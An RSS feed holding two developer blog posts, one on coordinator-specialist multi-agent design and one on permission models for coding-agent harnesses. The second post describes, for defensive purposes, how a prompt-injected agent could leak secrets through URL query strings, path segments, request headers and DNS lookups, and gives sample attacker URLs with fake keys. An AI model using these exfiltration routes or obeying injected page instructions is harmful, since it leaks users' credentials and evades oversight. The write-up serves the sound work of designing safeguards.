<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Virgil｜文剛</title>
    <description>The latest articles on Forem by Virgil｜文剛 (@virgil22).</description>
    <link>https://forem.com/virgil22</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3882965%2Fbdade190-b4cb-4029-8901-2d2127507d7e.jpeg</url>
      <title>Forem: Virgil｜文剛</title>
      <link>https://forem.com/virgil22</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/virgil22"/>
    <language>en</language>
    <item>
      <title>The division of labor in AI systems</title>
      <dc:creator>Virgil｜文剛</dc:creator>
      <pubDate>Sun, 26 Apr 2026 00:00:00 +0000</pubDate>
      <link>https://forem.com/virgil22/the-division-of-labor-in-ai-systems-1ha3</link>
      <guid>https://forem.com/virgil22/the-division-of-labor-in-ai-systems-1ha3</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbxs0slv6kh9ou9udgjyv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbxs0slv6kh9ou9udgjyv.png" width="800" height="600"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When building AI systems that handle multiple kinds of tasks, do you let different agents exist side by side — each owning its own domain — or do you funnel everything through a single entrypoint that routes to the right agent? At work, this design question has come up multiple times already.&lt;/p&gt;

&lt;p&gt;Last week, some colleagues and I presented our first agent POCs to the team, and that question has become more urgent.&lt;/p&gt;

&lt;p&gt;I’m increasingly convinced a single entrypoint routing to specialists is the better starting point, because the pattern itself is intuitive: a coordinator handles synthesis and judgment, and each task goes to a specialist that is capable enough for the job and cheaper than the coordinator. In a well-run office team, the coordinator handles the routing so specialists can focus. AI agents have different constraints, but the structural logic is the same: routing and deep domain work are different reasoning modes, and mixing them in a single agent has a cost.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5p8i5uek3gfnnf79dahh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5p8i5uek3gfnnf79dahh.png" alt="A flowchart showing a user request entering a coordinator node at the top, which routes it down to one of four specialist nodes — code, research, document, or reasoning — before all converge back to a single response." width="784" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The coordinator sits at the top, receives any request, and routes it to the right specialist before synthesising the response.&lt;/p&gt;
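&lt;p&gt;As a minimal sketch (the specialist names and the keyword router are placeholders, not any real framework’s API), the topology is just a routing function in front of a map of specialists:&lt;/p&gt;

```python
# Minimal coordinator-specialists sketch. The specialist names and the
# keyword-based router are illustrative placeholders; a real coordinator
# would make an LLM call to route and to synthesise.

SPECIALISTS = {
    "code": lambda task: f"[code specialist] {task}",
    "research": lambda task: f"[research specialist] {task}",
    "document": lambda task: f"[document specialist] {task}",
    "reasoning": lambda task: f"[reasoning specialist] {task}",
}

def route(task: str) -> str:
    """Pick a specialist by task shape, not by user choice."""
    rules = [("review", "code"), ("summarise", "document"), ("why", "reasoning")]
    for keyword, name in rules:
        if keyword in task.lower():
            return name
    return "research"  # default specialist

def coordinate(task: str) -> str:
    specialist = SPECIALISTS[route(task)]
    answer = specialist(task)
    # The coordinator owns synthesis: specialists never answer the user directly.
    return f"synthesised: {answer}"
```

The design point is that the user only ever talks to &lt;code&gt;coordinate&lt;/code&gt;; the routing decision is the system’s job, not theirs.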

&lt;h2&gt;The alternative&lt;/h2&gt;

&lt;p&gt;If each agent owns a clear domain — code, research, documentation — you pick the right one and off you go. The routing is done by the user, not the system. But what if the user has a request like “summarise the Q2 report and flag anything that looks wrong”? This is a retrieval task and a reasoning task at the same time. A side-by-side system would require you to split it upfront. The coordinator system handles the split for you.&lt;/p&gt;

&lt;h2&gt;What the coordinator enables&lt;/h2&gt;

&lt;p&gt;When the coordinator is responsible for understanding the request, the system can handle tasks that don’t fit neatly into one domain. Specialisation works on two levels. Domain — the problem space the specialist operates in, like code review or document retrieval. And thinking level — how deeply the specialist needs to reason. These aren’t the same thing. A simple script review and a complex distributed systems codebase are both code review, but they don’t call for the same reasoning depth. The coordinator doesn’t just pick the right domain specialist; it also has to estimate how much thinking the task requires.&lt;/p&gt;
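&lt;p&gt;A sketch of that two-level decision, assuming a toy setup where the coordinator sees the task text plus a rough size signal (both axes and the heuristics here are illustrative assumptions, not a real routing policy):&lt;/p&gt;

```python
# Two-level routing sketch: the coordinator picks a domain AND a thinking
# level. The domains, the levels, and the file-count heuristic are all
# illustrative stand-ins for what would really be an LLM judgment.
from typing import NamedTuple

class RoutingDecision(NamedTuple):
    domain: str    # problem space, e.g. "code" or "document"
    thinking: str  # reasoning depth, e.g. "shallow" or "deep"

def decide(task: str, context_files: int) -> RoutingDecision:
    domain = "code" if "review" in task.lower() else "document"
    # Crude proxy for reasoning depth: a review spanning many files calls
    # for a deeper (and pricier) reasoning budget than a one-file script.
    thinking = "deep" if context_files >= 10 else "shallow"
    return RoutingDecision(domain, thinking)
```

The point of the pair is that a simple script review and a distributed-systems codebase review share a domain but not a thinking level.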

&lt;h2&gt;What the research says&lt;/h2&gt;

&lt;p&gt;Google Research, Google DeepMind, and MIT published a large study on this in late 2025. In &lt;a href="https://arxiv.org/abs/2512.08296" rel="noopener noreferrer"&gt;Towards a Science of Scaling Agent Systems&lt;/a&gt;, they tested five architectures across four benchmarks and measured error amplification — how much a mistake in one agent’s output cascades through the rest of the system. Independent architectures (no inter-agent communication) amplified errors 17.2× over the single-agent baseline. Centralized coordination contained that to 4.4× through a validation bottleneck. Decentralized and Hybrid fell between them at 7.8× and 5.1× respectively.&lt;/p&gt;

&lt;p&gt;The picture isn’t one-directional: performance ranged from +80.9% on decomposable financial reasoning to −70% on sequential planning, depending on task structure. The coordinator-specialists pattern I’m describing isn’t universally better, but it’s better for the kind of work I’m thinking about. Trying this in practice will tell me where the boundaries actually are.&lt;/p&gt;

&lt;h2&gt;Where this leaves me&lt;/h2&gt;

&lt;p&gt;In my own research I have found that frameworks like &lt;a href="https://langchain-ai.github.io/langgraph/concepts/" rel="noopener noreferrer"&gt;LangGraph&lt;/a&gt; and &lt;a href="https://microsoft.github.io/autogen/stable/" rel="noopener noreferrer"&gt;AutoGen&lt;/a&gt; model this topology explicitly — a coordinator routing to specialists, with data passed between them. Both are on my list to dig into.&lt;/p&gt;

&lt;p&gt;The design question is still open, but I am leaning towards the coordinator-specialists pattern. I’ll find out more once I start building.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>devtools</category>
      <category>opinion</category>
    </item>
    <item>
      <title>Agents ask too many questions</title>
      <dc:creator>Virgil｜文剛</dc:creator>
      <pubDate>Tue, 14 Apr 2026 00:00:00 +0000</pubDate>
      <link>https://forem.com/virgil22/agents-ask-too-many-questions-4jnd</link>
      <guid>https://forem.com/virgil22/agents-ask-too-many-questions-4jnd</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvsa0dlkhhuowsbwge5ac.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvsa0dlkhhuowsbwge5ac.png" alt="Abstract digital scene of a glowing blue data stream colliding with a rigid amber geometric filter, illustrating tension between fluid AI processes and structured control systems." width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’ve used any agent harness for development work - Claude Code, OpenCode, Devin, or one of the many others - you’ve run into this: you’re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.&lt;/p&gt;

&lt;p&gt;The naive fix is to just trust the agent more - expand the allow list, enable auto mode, and move on. But that’s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is “just reading,” it can be manipulated into deciding that almost anything is.&lt;/p&gt;


&lt;div class="crayons-card c-embed"&gt;
&lt;p&gt;&lt;strong&gt;The Right Fix:&lt;/strong&gt; Take the decision away from the agent entirely. A policy layer external to the agent must inspect each action against objective criteria - the model’s intent is never consulted.&lt;/p&gt;
&lt;/div&gt;


&lt;h2&gt;Read-only is an objective property&lt;/h2&gt;

&lt;p&gt;An action is read-only if it observes without modifying. Not “read-only from the agent’s perspective” - objectively read-only. HTTP GET, file read, directory listing. These have a defined shape. A policy layer external to the agent can inspect each action against objective criteria - HTTP method, syscall type, file path - and make the call without asking the model what it thinks it’s doing.&lt;/p&gt;
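&lt;p&gt;A minimal sketch of such a check, assuming a simple dict-shaped action record (the schema is illustrative; a real policy layer would hook the proxy or syscall boundary rather than inspect dicts):&lt;/p&gt;

```python
# Objective read-only check, external to the agent. Classification is by
# what the action IS (HTTP method, file op), never by stated intent.
# The action schema here is an assumption for illustration.

READ_ONLY_HTTP = {"GET", "HEAD", "OPTIONS"}
READ_ONLY_FILE_OPS = {"read", "stat", "list_dir"}

def is_read_only(action: dict) -> bool:
    if action["kind"] == "http":
        return action["method"].upper() in READ_ONLY_HTTP
    if action["kind"] == "file":
        return action["op"] in READ_ONLY_FILE_OPS
    return False  # unknown action kinds are never auto-approved

def evaluate(action: dict) -> str:
    return "auto-approve" if is_read_only(action) else "prompt"
```

Note the fail-closed default: anything the policy layer cannot classify falls through to a prompt.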

&lt;p&gt;State-changing actions still prompt. Everything else passes automatically.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsjmyt7hbc3t1s4cbv7p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsjmyt7hbc3t1s4cbv7p.png" alt="A flowchart showing a policy layer intercepting an agent's action and routing it to auto-approve, prompt, or block based on whether it is read-only and whether it contains secrets." width="370" height="835"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The policy layer evaluates each action against objective criteria - the model’s intent is never consulted.&lt;/p&gt;

&lt;h2&gt;Two edge cases worth taking seriously&lt;/h2&gt;

&lt;p&gt;A GET request &lt;em&gt;can&lt;/em&gt; exfiltrate data. If an agent is manipulated into appending a secret to a query string - &lt;code&gt;https://example.com/?token=sk-ant-...&lt;/code&gt; - the request is technically read-only but it’s leaking something. The same applies to path segments: &lt;code&gt;https://attacker.example.com/exfil/sk-ant-api03-abc123&lt;/code&gt; is functionally identical, but some implementations only scan query parameters. And data can be stuffed into outbound request headers - &lt;code&gt;Referer&lt;/code&gt;, &lt;code&gt;User-Agent&lt;/code&gt;, a custom &lt;code&gt;X-Data&lt;/code&gt; header - none of which show up in URL inspection at all. The policy layer needs to handle all of this: run gitleaks-style pattern matching on the full URL &lt;em&gt;and&lt;/em&gt; outbound headers before granting automatic permission. If anything contains what looks like a secret or personal data, it gets flagged.&lt;/p&gt;
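&lt;p&gt;A sketch of that scan, with a single Anthropic-style key pattern standing in for a full gitleaks-style rule set:&lt;/p&gt;

```python
# Scan the FULL URL (query string and path segments alike) plus every
# outbound header before auto-approving a GET. The single key pattern is
# illustrative; a real deployment would load a complete rule set.
import re

SECRET_PATTERNS = [re.compile(r"sk-ant-[A-Za-z0-9\-]{8,}")]

def leaks_secret(url: str, headers: dict) -> bool:
    candidates = [url] + list(headers.values())
    return any(p.search(text) for p in SECRET_PATTERNS for text in candidates)
```

Because the whole URL string is scanned, query-parameter and path-segment exfiltration are caught by the same pass, and headers get no free ride.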

&lt;p&gt;DNS-based exfiltration is subtler. The agent resolves &lt;code&gt;sk-ant-api03-abc123.attacker.example.com&lt;/code&gt;. The GET never fires - but the DNS lookup already transmitted the secret to the attacker’s nameserver. This happens below the HTTP layer. URL pattern matching never sees it because there’s no URL yet. Mitigation: restrict DNS resolution to known domains, or run the same secret-pattern matching on hostnames before resolution.&lt;/p&gt;
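&lt;p&gt;The same idea applied before resolution, as a sketch (the allowlist suffixes are hypothetical, and the pattern again stands in for a full rule set):&lt;/p&gt;

```python
# Pre-resolution hostname check: run the secret patterns over the hostname
# itself, then require a known-domain suffix. Both the allowlist and the
# single key pattern are illustrative assumptions.
import re

SECRET_RE = re.compile(r"sk-ant-[A-Za-z0-9\-]{8,}")
ALLOWED_SUFFIXES = (".internal.corp", ".pypi.org")  # hypothetical allowlist

def may_resolve(hostname: str) -> bool:
    if SECRET_RE.search(hostname):
        return False  # secret smuggled into a DNS label
    return hostname.endswith(ALLOWED_SUFFIXES)
```

The check runs on the hostname string before any lookup fires, so the nameserver never sees the smuggled label.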

&lt;h2&gt;Prompt injection doesn’t break this&lt;/h2&gt;

&lt;p&gt;The obvious objection: what if the agent fetches a page that contains malicious instructions? The policy layer permits the fetch - it’s a GET - but now those instructions tell the agent to delete all your data.&lt;/p&gt;

&lt;p&gt;This isn’t a problem. That deletion is a new action, evaluated independently by the policy layer at the point of execution. It gets flagged as a write and stopped. The model read something bad, but reading bad content doesn’t bypass the enforcement layer.&lt;/p&gt;

&lt;h2&gt;Where things stand&lt;/h2&gt;

&lt;p&gt;Most agent harnesses are moving toward fewer interruptions. Allow lists, intent classifiers, “auto mode” flags - these are all variations on the same theme: the harness tries to determine what’s safe by reasoning about the agent’s intent.&lt;/p&gt;

&lt;p&gt;The problem is that intent is opaque and manipulable. A classifier trained to identify “safe” actions can be nudged into misclassifying. A model asked “is this safe?” can be prompted into saying yes. And in practice, these systems are reportedly brittle - auto modes that don’t fire when they should, classifiers that trigger on actions they shouldn’t.&lt;/p&gt;

&lt;p&gt;The missing piece is enforcement that’s external and objective. Not a model deciding what’s safe. Not a classifier trained on past behavior. A proxy or kernel filter that doesn’t care what the model thinks - it only cares what the action &lt;em&gt;is&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;This isn’t theoretical. The pattern works because read-only and write are fundamentally different categories of action, not a spectrum the model has to reason about. An HTTP GET, a file read, a directory listing - these can be authorized by policy without ever asking the agent. Everything else gets held.&lt;/p&gt;

&lt;h2&gt;For builders and power users&lt;/h2&gt;

&lt;p&gt;If you’re building an agent harness: this is the permission model you want. Inspect actions at the transport or syscall layer, classify by type, apply pattern matching on sensitive data. The agent sees no prompts for reads; it only stops for writes.&lt;/p&gt;

&lt;p&gt;If you’re choosing a harness: look for one with an external policy layer, not one that delegates trust to the model. Fewer interruptions are nice, but they only matter if the enforcement is real.&lt;/p&gt;

&lt;p&gt;How are you handling agent permissions today: are you leaning toward auto-approve or manual confirmation? And have you run into the edge cases around secret exfiltration via URL or headers? Let me know in the comments.&lt;/p&gt;

&lt;h2&gt;Further reading&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://attack.mitre.org/techniques/T1048/003/" rel="noopener noreferrer"&gt;MITRE ATT&amp;amp;CK T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol&lt;/a&gt; - the canonical reference for DNS-based and other alternative-protocol exfiltration.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/gitleaks/gitleaks" rel="noopener noreferrer"&gt;Gitleaks&lt;/a&gt; - the secret-scanning tool referenced in this post. Regex-based pattern matching for API keys, tokens, and credentials.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>devtools</category>
      <category>security</category>
      <category>opinion</category>
    </item>
  </channel>
</rss>
